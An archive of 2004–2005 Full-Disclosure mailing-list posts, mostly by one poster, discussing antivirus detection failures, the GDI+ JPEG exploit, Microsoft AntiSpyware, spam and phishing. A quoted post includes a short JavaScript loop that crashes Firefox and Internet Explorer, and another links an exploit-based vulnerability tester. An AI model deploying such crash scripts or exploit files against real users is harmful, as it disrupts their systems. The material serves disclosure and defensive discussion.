[Full-Disclosure] RE: Full-Disclosure Digest, Vol 4, Issue 11
Andrey, Just to add to the concern you bring up is what VirusTotal also shows on the Detection failures. http://www.virustotal.com/flash/graficas/grafica4_en.html Of course for me that's job security but none the less its pitiful. And now in steps Microsoft with Billions under its belt and I'll bet the odds won't change much. That's where I get really confused. We know that costs go in to the billions when networks go down due to infections. I know of no one but the parity actors for AOL who welcome infections. I'm just dumb founded on the abilities of virus companies to battle this. I'm finding that my preconceived label of who the virus writers are and look like are rapidly being changed. I used to envision this lad with a tattered def leopard shirt sitting with an old laptop in the wee early dawn finishing up his code and getting ready to test it on the old grey Pentium box in the corner. Is this the guy beating the pants off the billion dollar companies? I would also like to add that what you've done is very impressive. I'm reading your paper now. I could and will never be able do such so thanks for this well written piece. Please tell me your not wearing a def leopard t-shirt! thank you Randall M If we ever forget that we're one nation under God, then we will be a nation gone under. - Ronald Reagan _ Andrey so correctly acknowledged: -- Message: 8 Date: Fri, 4 Mar 2005 15:03:10 -0600 From: Andrey Bayora [EMAIL PROTECTED] Subject: [Full-Disclosure] Bypass of 22 Antivirus software with GDI+ bug exploit Mutations - part 2 To: full-disclosure@lists.netsys.com Cc: bugtraq@securityfocus.com Message-ID: [EMAIL PROTECTED] Content-Type: text/plain; charset=ISO-8859-1 The first part is here: http://archives.neohapsis.com/archives/fulldisclosure/2004-10/0475.html First, this post isnt about how dangerous GDI+ bug or malicious JPEG image, but how good is your antivirus software. The issue is: only 1 out of 23 tested antivirus software can detect malicious JPEG image (after 6 month from the public disclosure date). Here is the link to results, JPEG file and my paper (GCIH practical) that describes how to create this one: http://www.hiddenbit.org/jpeg.htm This one vendor (Symantec) that can detect it, obviously do it with the heuristic detection (I dont work for them and didnt send them any file, moreover I know cases when Symantec didnt detect a virus that other vendors do). ClamAV antivirus detected this JPEG file 4 month ago, but strangely cant detect it now. What happened? What about 22 antivirus software vendors that miss this malicious JPEG? The pattern or problem in these JPEG files is known and still many antivirus software vendors miss it, did it can represent the quality of heuristic engines? OK, we know that any antivirus software can provide 100% protection P.S. After my first post (October 14,2004) about this problem all antivirus software vendors added detection to the demo file provided by me in couple of hours. Sadly for me, but it seems that they prefer playing cat and mouse and not improve heuristic engines Regards, Andrey Bayora. CISSP, GCIH - And so ends his thoughts ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Strange connection from google desktop search
The following established connection was noticed: TCPxxx.xxx.x.xx:2869 64.233.187.104:80 ESTABLISHED 2824 Process viewer reported it to be: Googledesktop.exe SamSpade says: 03/05/05 21:54:31 whois 64.233.187.104 I don't recognise any domain in 187.104, trying internic whois -h whois.internic.net 187.104 ... Whois Server Version 1.3 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. No match for 187.104. 03/05/05 22:07:21 finger @ 64.233.187.104 finger @ 64.233.187.104 failed, no such host 03/05/05 22:07:47 dns 64.233.187.104 No DNS for this address (host doesn't exist) Have I been up to long and too much coffee or is this strange? Or is this because I have been playing around with the bulzano2.jpg!!! thank you Randall M If we ever forget that we're one nation under God, then we will be a nation gone under. - Ronald Reagan _ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Microsoft sure fire customer satisfaction
___ Afraid Microsoft's anti-spyware will muck up your hard drive, erasing your digital photos, music collection and work files? Don't worry, you've got a $5 rebate coming your way in this worst-case scenario--enough to buy five songs on iTunes. That is, if you read and take advantage of Microsoft's legal promise. Read more here: http://news.zdnet.com/2100-1009_22-5590042.html ___ thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [Full Disclosure] RE: this IS FUN!!!!
Jordan wrote: [Full-Disclosure] this is fun? Jordan Klein haplo at haplo.net Sun Feb 20 11:12:39 EST 2005 Previous message: [Full-Disclosure] this is fun? Next message: [Full-Disclosure] this is fun? Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] I wouldn't call that fun. It took my system to 100% cpu usage, spawned a ton of windows, and eventually caused firefox to crash. I guess that crash was firefox's built-in protection mechanism against this type of DoS. :-) I haven't tried this with popup blocking enabled, since this is my work machine, and I have to allow popups so our internal sites work. (Damn, lazy web developers...) -- Jordan Klein ~ Beware of dragons haplo at haplo.net ~ for you are crunchy UNIX System Administrator~ and go well with ketchup - Original Message - From: Christian evilninja at gmx.net To: full-disclosure at lists.netsys.com Cc: Brandy Simon brandysimon at gmail.com Sent: Sunday, February 20, 2005 7:51 AM Subject: Re: [Full-Disclosure] this is fun? }} WOW! I had fun trying to capture the source page!!! thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Scan for IRC
I am so sorry for interrupting the list. I'm trying to pick up IRC communications on the network. I've made some filters for Ethereal and Observer but can't seem to pick it up. I'm doing something wrong. Used the 6668-6669 ports. Any help? thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Wide spread DSV
Problem: Down Syndrome Virus (DSV) Affected devices: Various web, internet, intranet and PC's. Severity: DOA (Denial of Access). Author: Ima Notserious Warnings: Elevated Fix: At present no available fixes. : Overview: Many users have been reporting various sites to be down. This has a wide spread effect and can be found across the internet and intranets. The DSV has even been reported to effect PC's and other devices :: Details: Internet/Intranet: When user clicks on links or types in addresses browsers hesitate then display 404 messages. PC's: When power buttons are used to start PC, expected operating systems fail to load with various failed messages. :: Reason for Elevated Warnings: The DSV was elevated do to the infection spreading to a PC. A researcher found this after visiting one of the reported down sites. After reboot of PC, the PC failed to load. The site in question was Amazon.COM. :: Fix: At present researchers are conducting various tests to find out how the DSV infects, the mechanism used to spread and what if any fixes are available. It has been reported that the possible spread is thru port 25. At present some service providers have begun to test this by blocking the port. :: Work around: Do not visit any sites on internet or intranets. Do not turn PC's off if you have recently visited any sites on the Web. Advisory by: WorldWideWatchers.Inc Copyright (c) 2004 WWW.Inc ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure: Interesting but suspicious possible phishing mail
Have been getting a number of these come thru also at work. Of course all the users are asking me questions about these. They all have the strange words, paragraphs, and questions like this one. They really got my attention. I at first thought they were hidden messages but Not so as the one we receive come as text. thank you Randall M |-- | |Message: 4 |Date: Tue, 11 Jan 2005 02:27:55 + |From: DAN MORRILL [EMAIL PROTECTED] |Subject: [Full-Disclosure] Interesting but suspicious possible | phishing mail |To: full-disclosure@lists.netsys.com |Message-ID: [EMAIL PROTECTED] |Content-Type: text/plain; format=flowed | |Hi folks, | |Got this really interesting mail in my box today, and |knowing that I haven't |used that e-mail address or ordered anything on line lately. |Wondering if it |might not be a phishing e-mail. Haven't seen anything like |this before. |Anyone see anything similar? |r/ |Dan | | | |from : Gabrielle U. Philips, Jr [EMAIL PROTECTED] |Sent : Monday, January 10, 2005 10:40 PM |To : Gabrielle U. Philips, Jr [EMAIL PROTECTED] |CC : [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], |[EMAIL PROTECTED], [EMAIL PROTECTED] |Subject : Shipping Notification, Tracking Number : |TCD461649887242ESB | |MIME-Version: 1.0 |Received: from msnmail2.uswest.net ([63.226.138.22]) by |mc10-f38.hotmail.com |with Microsoft SMTPSVC(6.0.3790.211); Mon, 10 Jan 2005 14:45:54 -0800 |Received: (qmail 72801 invoked by uid 0); 10 Jan 2005 22:45:55 - |Received: from unknown (63.226.138.18) by |msnmail2.uswest.net with QMQP; 10 |Jan 2005 22:45:55 - |Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 - |Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by |mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 - |X-Message-Info: JGTYoYF78jHm2Kmrh/becsOSGajhcE+aqhdcaXLDOFI= |Delivered-To: [EMAIL PROTECTED] |X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4 |Fuz1=4Fuz2=4 |Return-Path: [EMAIL PROTECTED] |X-OriginalArrivalTime: 10 Jan 2005 22:45:54.0814 (UTC) |FILETIME=[24BA71E0:01C4F766] | | | | |Content-Type: multipart/mixed; |boundary=-mpls-cmx-12.inet.qwest.net-1105397155-56110 | | |Content-Type: text/plain | | |This email was forwarded from your previous Qwest.net email address |to your MSN email address. To discontinue email forwarding for any |future emails sent to your previous Qwest.net email address, please |contact MSN Customer Service. | | | | | |Content-Type: message/rfc822 |Content-Description: forwarded message |Content-Transfer-Encoding: 8bit |Content-Disposition: inline | | |From: Gabrielle U. Philips, Jr [EMAIL PROTECTED] |To: Gabrielle U. Philips, Jr [EMAIL PROTECTED] |Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], |[EMAIL PROTECTED], |[EMAIL PROTECTED] |Subject: Shipping Notification, Tracking Number : TCD461649887242ESB |Sent: Monday, January 10, 2005 10:40 PM |MIME-Version: 1.0 |Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 - |Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by |mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 - |X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4 |Fuz1=4Fuz2=4 Content-Type: multipart/alternative; |boundary=--Part_GRKDac7J6.oMXawOLoYO4 | | |Content-Type: text/html; format=flowed; charset=iso-8859-15 |Content-Transfer-Encoding: quoted-printable | |Check your status Below: | |cov2pa.com/track.asp?cg=1c=tc | |The illiterate of the 21st century will not be those who |cannot read and |write, but those who cannot learn, unlearn, and relearn. |Alvin Toffler |Those police officers are practicing driving between the two |buildings. |The illiterate of the 21st century will not be those who |cannot read and |write, but those who cannot learn, unlearn, and relearn. |Alvin Toffler |Haven't the photographers already disliked praying? |Few things are harder to put up with than the annoyance of a |good example. |3 |When people are free to do as they please, they usually |imitate each other. |-Eric Hoffer (1902-1983) |Have you already loved sleeping? | ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Microsoft AntiSpyware: Will it be free and Vulnerable
On Thu, 6 Jan 2005, James Patterson Wicks wrote: While this was just a quick test to satisfy my curiosity about the Microsoft tool, my initial feeling is that the Microsoft AntiSpyware is worth a test deployment in the office. This beta expires in July. Hopefully the final version will be free and allow for centralized domain management. It's the least that Microsoft can do. I don't think it's going to be free. While doing a small amount of research on the spyware community I found this text string in the GianttAntiSpywareUpdater.exe: Because your Microsoft AntiSpyware subscription has expired, needed spyware definitions could NOT be downloaded and installed. Your definitions should be updated as soon as possible to prevent spyware infections. Your Microsoft AntiSpyware Subscription has Expired And within the gcASNotice.exe We hope your trial went well. Unfortunately you are now no longer protected from the growing dangers of spyware, worms and trojans. Continue to keep your self protected, purchase the full version today with a full money back guarantee. I also have been a bit curious concerning the user community and the way this type of software updates, whether or not they can be exploited this way. Now I would like to RANT a bit here. After picking myself up off the floor from reading this I chose to post this. The primary reason most spyware and trojans get unauthorized access to my computer is because of my blind trust in the products I use. One such product was a browser embedded in the operating system I own. To rid myself of such unauthorized accesses I had to educate myself and find software to do it. Most of them are freely developed (God Bless Them Each and Everyone). Alone comes a program to do this own by the operating system and products I use. I was happy and thought, who would be better equipped to do such then the owners themselves. After all they wrote and know all the programming of it. The can surely protect it. According to the above txt scans of this product I have to pay them to defend what they allowed. Its a strange strange world after all. I don't want to sound condescending but, if this is the case, this Company software needs some humility lessons brought to them through heavy exploitations of such software. On the other hand if such Company would provide this as a service to me then they need a community helping hand. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Microsoft AntiSpyware - First Impression
KF (lists) wrote: Message: 11 Date: Fri, 07 Jan 2005 11:19:56 -0500 From: KF (lists) [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Microsoft AntiSpyware - First Impressions To: full-disclosure@lists.netsys.com Message-ID: [EMAIL PROTECTED] Content-Type: text/plain; charset=windows-1252; format=flowed Do a software update check with this thing and you get GIANTAntiSpywareMain.exe listening on port 2571 until the software is closed. Feel free to beat on and fuzz that port fellas. =] -KF I found this with tcpview: GIANTAntiSpywareMain.exe:3424 TCP p4fast..com:3256 216.32.240.26:http ESTABLISHED GIANTAntiSpywareMain.exe:3424 UDP p4fast:3255 *:* OrgName:Savvis OrgID: SAVVI-2 Address:3300 Regency Parkway City: Cary StateProv: NC PostalCode: 27511 Country:US ReferralServer: rwhois://rwhois.exodus.net:4321/ NetRange: 216.32.0.0 - 216.35.255.255 CIDR: 216.32.0.0/14 NetName:SAVVIS NetHandle: NET-216-32-0-0-1 Parent: NET-216-0-0-0-0 NetType:Direct Allocation NameServer: DNS01.SAVVIS.NET NameServer: DNS02.SAVVIS.NET NameServer: DNS03.SAVVIS.NET NameServer: DNS04.SAVVIS.NET Comment: RegDate:1998-07-30 Updated:2004-10-07 GET / HTTP/1.1 Host: 216.32.240.26 Connection: close User-Agent: Sam Spade 1.14 HTTP/1.1 403 Forbidden Content-Length: 218 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET MicrosoftOfficeWebServer: 5.0_Pub Date: Sat, 08 Jan 2005 16:40:07 GMT Connection: close If you look at for instance system process, BHO area and select an unknown, an option to send to spynet for anayliss is there. If you select this, it reports to the 216.31.240.26 also. On a funny note, under ActiveX area it list the microsoft update as this: Microsoft Windows Update Control Engine This is an unknown ActiveX File path: C:\WINDOWS\System32\iuengine.dll Description: Windows Update Control Engine Publisher: Microsoft Corporation Last modified: Tue, 26 Aug 2003 01:19:52 GMT Installed version: 5,4,3790,14 Download location: http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37921.827546 2963 It does look as if they jumped very quickly to launch this software! thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] FIREFOX flaws: nested array sort()
So, where do you all stand. Exploit for fame or for purpose? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Berend-Jan Wever Sent: 25 November 2004 01:05 To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception Hi all, Same flaw works for Firefox as well as MSIE: HTML SCRIPT a = new Array(); while (1) { (a = new Array(a)).sort(); } /SCRIPT SCRIPT a = new Array(); while (1) { (a = new Array(a)).sort(); } /SCRIPT /HTML Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course how to write a bug report and go through all that bugzilla crap. Cheers, SkyLined http://www.edup.tudelft.nl/~bjwever Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] How the hell can we CAN SPAM??
It's just getting ridicules not to mention what it cost all of us in the end. And might I add doesn't make since. I mean, they spam selling something with no real contact but a spoofed one or real website to reach (most of the time). I placed an web appliance at my work place and catch an average of 52000 in 7 days. My ISP has spam filters yet I still receive a number a day. Now I am also the return to sender because of email spoofing. I get about 40-50 returned to sender, or can't deliver emails (not to mention what my ISP catches). There is not a dam thing I can do about it. Let add to this the problem for legit company's who have this done to them and they are placed on the blacklist. They are victims of this abuse that causes undo problems with their business affairs and it backlashes to their clients. I often have to help fight for some of our clients who have been victimized this way. They are not spammers but their addresses have been spoofed and blacklisted and now any client who uses spam blacklist block their legit address and miss their business correspondence. As for myself I am stuck with the pain of removing my email and setting up another one and the pain of contacting all correspondences who have that one to change it to the new one, etc., etc.. Or I could attempt to figure out the real senders, send abuse email out and hope someone would answer and help. Doubt that would work. Example: _- Date: Wed, 17 Nov 2004 12:12:27 + From: Mail Delivery System [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Mail delivery failed: returning message to sender This message was created automatically by mail delivery software (Exim). A message that you sent could not be delivered to one or more of its recipients. This is a permanent error. The following address(es) failed: [EMAIL PROTECTED] unknown local-part byoder in domain bt.net -- This is a copy of the message, including all the headers. -- Return-path: lt;[EMAIL PROTECTED]gt; Received: from [217.35.209.184] (helo=insmtp22.bt.net) by insmtp01.ukcore.bt.net with esmtp (Exim 3.36 #1) id 1CUOfh-000628-00 for [EMAIL PROTECTED]; Wed, 17 Nov 2004 12:12:25 + Received: from [211.186.238.119] (helo=therightmoment.com) by insmtp22.bt.net with smtp (Exim 3.36 #1) id 1CUOTM-00043p-00 for [EMAIL PROTECTED]; Wed, 17 Nov 2004 11:59:40 + Received: from fidnet.com (fidnet.com.mail5.psmtp.com [64.18.5.10]) by therightmoment.com (Postfix) with ESMTP id 3097F4FF8C for lt;[EMAIL PROTECTED]gt;; Wed, 17 Nov 2004 06:09:31 -0600 Message-ID: lt;[EMAIL PROTECTED]gt; From: Tickled B. Pulsar lt;[EMAIL PROTECTED]gt; To: Byoder lt;[EMAIL PROTECTED]gt; Subject: =?iso-8859-1?B?VmFyaW91cyBQaWxscywgTG93IHJhdGVzLCBtb25leWJhY2sgZ3VhcmFu?= =?iso-8859-1?B?dGVlISA=?= Date: Wed, 17 Nov 2004 06:09:31 -0600 MIME-Version: 1.0 Content-Type: multipart/alternative; charset=iso-8859-1; boundary==_NextPart_000_0005_DDA5806C.B53BEAE9 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1081 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2479.0006 ___ The email message that was enclosed for these headers was a complete non sense one full of meaniless verbage like: __- TBODY TR TD bgColor=3d#99 height=3d22 DIV align=3dcenterSPAN class=3dstyle13Once something becomes di= scernible, or understandable, we no longer need to repeat it=2e We can de= stroy it=2e/SPAN/DIV/TD/TR/TBODY/TABLE TABLE cellSpacing=3d0 cellPadding=3d0 width=3d100% border=3d0 TBODY __ We talk about the scare of government control. Someone then tell me who else has the power to step in and stop the viral and spam. Who else has the money to back massive counter measures to put a stop to it all. I'm I just being too critical and a doom and gloom user. FYI: Yes I have ensured that I'm not zombified. I then tested again by turning off my internet use for two days and still received returns for those days. I clean machines for things like this for a living. Thanks for asking. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Securing My Mobile users
I'm attempting to find some simple free programs that will help secure my mobile users. Simple because anything above sitting in the tray will confuse them. I'm testing this on a computer that is XP2 patched, McAfee 80 which has file creation type protection, Google blocker, Spybot and Previx protection system program. A little program called pcAudit which claims to act like a hacker intervention has you do a few things then sends the information to their server and creates a report for you to view. The report show what you typed in the browser or program you used, shows what's in your documents folder, and takes a snapshot of your desktop. The settings I ended with was to prevent creation of .dll files in system, system32 folders, prevent unwanted programs, key loggers, etc., in McAfee. I did not do anything with XP firewall and kept Previx at defaults. Each time the pcAudit could show the same results even if the .dll was prevented from being created. It still gave the snapshots, documents folder and reported what I typed. What I'm seeing here is that the most simplest settings that can be aloud have no protection. The mobile salesperson can't and refuses to be bothered with any more then this. If this simple program could do that, my users are doomed if they clicked on a link and a more malicious program was loaded. Has anyone here examined this pcAudit program? Can they explain what makes it tick? thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Norton AntiVirus Script Blocking Exploit -- Symantec's response
Daniel, Man, that was just awsome! Enjoyed the movie and the popcorn! Like to see more PoC like that!! thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Includes PoC VBScript Code)
Daniel told me: --__--__-- Message: 4 Date: Wed, 03 Nov 2004 20:09:02 -0500 From: Daniel Milisic [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: [Full-Disclosure] Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Includes PoC VBScript Code) Hi All, I have major issues with the quality of Norton AntiVirus. For some history, see: http://seclists.org/lists/fulldisclosure/2004/Oct/0540.html - Norton AntiVirus 2004 Script Blocking Failure (Rant and PoC enclosed) http://seclists.org/lists/fulldisclosure/2004/Oct/0775.html - Norton AntiVirus 2004/2005 Script Blocking Redux Symantec's Response to this issue: (From a week ago) ScriptBlocking is intended to provide proactive detection against script-based worms and this component of Norton AntiVirus has been effective at doing this since its introduction in 2001 Huh? Below is a 'typical' script-based virus that Norton AntiVirus will allow a user to run, without *any* intervention on NAV's part whatsoever. It's likely that code similar to this is already appended to script-based threats/worms to assist their penetration in the wild. --__--__-- Dam. McAfee picked it right up as viral. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Gmail fixed
6. Google blocks Gmail exploit By: John Leyden, The Register Google has fixed a flaw in its high-profile webmail service, Gmail, which created a possible route for hackers to gain full access to a user's email account simply by knowing their user name. http://www.securityfocus.com/news/9843 http://www.securityfocus.com/news/9843 P.S. Anyone else on this list been a victim of email spoofing lately? An old account (non default)of mine is being used and I'm receiving about 20-30 returned emails(And I mean spoofed email headers). thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Help, possible rootkit
Billy said: --__--__-- Message: 1 From: BillyBob [EMAIL PROTECTED] To: Full Disclosure [EMAIL PROTECTED] Date: Sat, 23 Oct 2004 13:05:29 -0300 Subject: [Full-Disclosure] Help, possible rootkit I have noticed that my XP system is behaving like I have a rootkit. -- -- -- __ __ Billy, 1. Go directly to safe-mode 2. go to regedit and check start up processes in computer and user and research each unfamiliar 3. run hijack this program 4. run spybot 5. upon start up use tcp-view and process viewer from sysinteral.com to see connections One person made mention of this once when I had this problem on a sales laptop: If you have scripting enabled, it is possible that one of them is doing this in the background. Scripts can remain active after you have left the page that started them. Some PC programmers tend to use busy waits instead of calling a sleep() or hibernate() function. This tends to kill performance on multiuser systems. Optical mice also don't work well with certain colored pads and such. Make sure you try A different surface. Also of course clean the area very well. A piece of hair can cause problems. Just some quick thoughts thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Senior M$ member says stop using passwords completely!
http://blogs.msdn.com/robert_hensing/archive/2004/07/28/199610.aspx http://blogs.msdn.com/robert_hensing/archive/2004/07/28/199610.aspx thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Your daily internet traffic report
Router locationindex router1.iust.ac.ir Iran (Tehran) 29 Which one of you are attacking Iran http://www.internettrafficreport.com/asia.htm thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Senior M$ member says stop using passwords completely!
I did. He said stop using passwords. I'm not flamming, I was passing on an article. thank you Randall M |-Original Message- |From: Aviv Raff [mailto:[EMAIL PROTECTED] |Sent: Saturday, October 16, 2004 10:19 AM |To: 'RandallM'; [EMAIL PROTECTED] |Subject: RE: [Full-Disclosure] Senior M$ member says stop |using passwords completely! | | |No... |Senior Microsoft member says: use passPHRASES instead of passWORDS. | |You should read the article before you start flaming. | |-- Aviv. | |-Original Message- |From: [EMAIL PROTECTED] |[mailto:[EMAIL PROTECTED] On Behalf Of RandallM |Sent: Saturday, October 16, 2004 3:14 PM |To: [EMAIL PROTECTED] |Subject: [Full-Disclosure] Senior M$ member says stop using |passwords completely! | | | |http://blogs.msdn.com/robert_hensing/archive/2004/07/28/199610.aspx |http://blogs.msdn.com/robert_hensing/archive/2004/07/28/199610.aspx | |thank you |Randall M | | | ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
Oh my Gawd! I think I've fallen in love! You will be hearing from me soon! --__--__-- Message: 4 Date: Wed, 13 Oct 2004 10:28:40 -0700 (MST) From: Jay Jacobson [EMAIL PROTECTED] To: Mr. Rufus Faloofus [EMAIL PROTECTED] cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Nessus experience SNIP Of course, another good place for these questions would be the Nessus mailing list. You may also want to check out Edgeos' Nessus Knowledge Base, which documents every configuration option in Nessus http://www.edgeos.com/nessuskb/. -- .. .. Jay Jacobson .. Edgeos, Inc. - 480.961.5996 - http://www.edgeos.com .. .. Network Security Auditing and .. Vulnerability Assessment Managed Services .. --__--__-- thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1955 - 19 msgs
GuidoZ Didn't mean to have you apologize, it did it's job. It showed That I was not vulnerable. I just found it interesting that my AV called it something that could not be found through search. thank you Randall M |-Original Message- |From: GuidoZ [mailto:[EMAIL PROTECTED] |Sent: Thursday, October 07, 2004 1:16 AM |To: RandallM |Cc: [EMAIL PROTECTED] |Subject: Re: [Full-Disclosure] RE: Full-Disclosure digest, |Vol 1 #1955 - 19 msgs | |It might be detected as Trojan.Moo or any other variant of |the JPEG exploit. As I said, it attempts to exploit the |system to see if it's vulnerable, using an infected JPG. |The file I provided is simply a SFX with a batch file and |the infecte JPG (named exploit.bak). No attempt has been |made at all to mask what's inside. | |I figured those that would want to use it would either not |worry about the virus warnings, or not get them at all and |REALLY need the fix it helps provide. =) Email me at the |address provided in my original email (exploit _AT_ guidoz |_DOT_ com) and I'll provide a link to the batch files and |such so you may modify them as you wish. | |Sorry for any confusion with the AV. I should of warned |about that in the original email. (Others have written me |asking the same question.) I only provided it to possibly |help others who have lots of friends asking them for help to |patch their systems. This simply sees if they are |vulnerable, then leads them through the steps to patch the |system if they are. (You may have to tell them to ignore AV |warnings, or disable the AV scanner. Again, I urge you to |test this on a NON-PRODUCTION machine first. See what it |contains, read the batch files, see what it downloads, etc.) | |Please feel free to ask me any questions. Hope it helps someone else. | |-- |Peace. ~G | | |On Wed, 6 Oct 2004 20:59:28 -0500, RandallM |[EMAIL PROTECTED] wrote: | | |--__--__-- | | | |Message: 14 | |Date: Wed, 6 Oct 2004 15:53:32 -0700 | |From: GuidoZ [EMAIL PROTECTED] | |Reply-To: GuidoZ [EMAIL PROTECTED] | |To: [EMAIL PROTECTED] | |Subject: [Full-Disclosure] Quick JPEG/GDI test fix |(timesaver) | | |Hello list, | |I wrote a very simple program/batch file | that tests for the JPEG |exploit, then if affected, provides | instructions on how to patch the |exploit. It has been |tested on my | own lil happy lab network, as well |as one one network |where I'm a | sysadmin. (Tested on Windows XP Home |and Pro, SP1a and |SP2.) | | |It DOES test for the exploit by attempting to use an |infected JPG | |which downloads the instructions for fixing it, if |exploited. By | |viewing the strings in the JPG, you can see the file it |downloads | and |check it out for yourself. It's clean. =) Just |contains a batch | file |and a program to launch the batch file. (The file |that gets | |downloaded |is a simple SFX.) Links are below. It contains a | warning saying it's |about to try to exploit the system |and to save | data in open programs. | |(It also warns that Explorer may crash.) | |I wrote |this merely | to save myself time and allow friends/family to |test their own | systems, then patch them without having to call me for ||help. It's | not been tested in every environment and in every |scenario. | |If you find a problem, feel free to email me (exploit |_AT_ guidoz | |_DOT_ com) Obviously I'm not responsible if it's abused ||somehow, | or if |it breaks something, etc. Feel free to modify it |to suit your | own |needs, but use it at your own risk. | | | |Test can be downloaded from here: | |http://www.guidoz.com/exploit-test.exe | | | |Again, it's just an SFX archive with a batch file. Hopefully it | will |save someone else some time. I've used it to have | friends/family (and |a few clients) patch a total of |around 30 machines without problems. | | | |-- | |Peace. ~G | | | | | |--__--__-- | | | |End of Full-Disclosure Digest | | | | Well, guess I'm safe. McAfee saw it as |Exploit-MntRedir.gen and said...NO! | I googled it and it found nothing though. Thought it would atleast | lead me to McAfee. McAfee search said: | | We found no records matching the following criteria: | Virus name containing MntRedir.gen. | Please try narrowing your search by using fewer characters. | | What gives? | | thank you | Randall M | | ___ | Full-Disclosure - We believe in it. | Charter: http://lists.netsys.com/full-disclosure-charter.html | | ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Symantec Security Report 1V
http://www.securityfocus.com/columnists/271 Very interesting and yet kinda scarry! Symantec gave their view on the trend of internet attacks. I'd be very interested on the views from this list. There is one area that is starting to concern me at my place of employment and that is IM's. I delete them and the next day they're back. What I need is some POC to show the bosses concerning the vulnerabilities associated with them. Which I believe is a trend that will increase greatly. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] House approves spyware legislation
The U.S. House of Representatives voted late Tuesday to restrict some of the most deceptive forms of spyware. By a 399-1 vote, House members approved legislation prohibiting taking control of a computer, surreptitiously modifying a Web browser's home page, or disabling antivirus software without proper authorization. http://news.com.com/House+approves+spyware+legislation/2100-1028_3-5397822.h tml?tag=nefd.top thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] House approves spyware legislation
